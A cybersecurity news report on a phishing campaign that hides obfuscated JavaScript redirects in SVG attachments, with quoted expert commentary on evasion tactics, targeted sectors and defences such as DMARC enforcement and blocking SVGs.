A new phishing campaign leveraging SVG files to deliver JavaScript-based redirect attacks has been uncovered by cybersecurity researchers.
The attack utilizes seemingly benign image files to conceal obfuscated script logic that redirects users to malicious domains without requiring the download of files or user interaction.
According to a new advisory published by Ontinue today, unlike traditional phishing methods that drop executables or use macro-laden documents, this campaign embeds JavaScript into the section of an SVG file.
Once opened in a browser, the code decrypts a secondary payload using a static XOR key and then redirects the user to an attacker-controlled site via the window.location.href function. These URLs often include Base64-encoded strings for victim tracking.
The emails distributing these SVGs are sent using spoofed addresses or domains that mimic legitimate brands. Many of the recipient domains lacked proper email authentication controls, including:
-
No DKIM records
-
Missing or unenforced DMARC policies
-
Misconfigured SPF settings
“This is a fresh spin on the technique of using image files for delivering suspect content, in this case, malicious PDFs,” said John Bambenek, president at Bambenek Consulting.
“The attackers have to rely on complacency (‘it's only an image, it doesn’t execute code’) to lull organizations into accepting this content and getting it on the inside of a network.”
Evasion and Infrastructure Tactics
The attackers have integrated geofencing into their landing pages and use short-lived, randomized domains to stay ahead of static detection techniques. The payload is often hosted externally or attached directly to the email, with minimal content in the message body to avoid suspicion.
Read more on phishing tactics targeting corporate infrastructure: Precision-Validated Phishing Elevates Credential Theft Risks
Unlike previous SVG-based threats that relied on hosted payloads or third-party file sharing, this campaign runs entirely within the client’s browser. By avoiding executable drops and leveraging trusted web functions, it bypasses many endpoint detection tools.
“Defenders must collapse the old distinction between code and content,” warned Jason Soroko, senior fellow at Sectigo.
“Treat every inbound SVG as a potential executable. Strip or block script tags. Enforce strict DMARC alignment and auto-purge questionable mail. Instrument telemetry to catch browser pivots triggered by window location changes that originate from image previews.”
Campaign Targets and Recommendations
The phishing campaign appears to focus on B2B service providers with access to sensitive financial and employee data.
This includes:
-
SaaS platforms
-
Utility companies
-
Financial services vendors
“While this report and research is valuable to enterprises, and the search valuable for hunt teams, organizations without a security staff or end consumers will remain vulnerable to conventional cybercrime with this technique,” Bambenek added.
To mitigate the threat, Ontinue recommends enabling Safe Links and Safe Attachments, enforcing DMARC, blocking SVGs and educating users on risky attachments.
No tags.
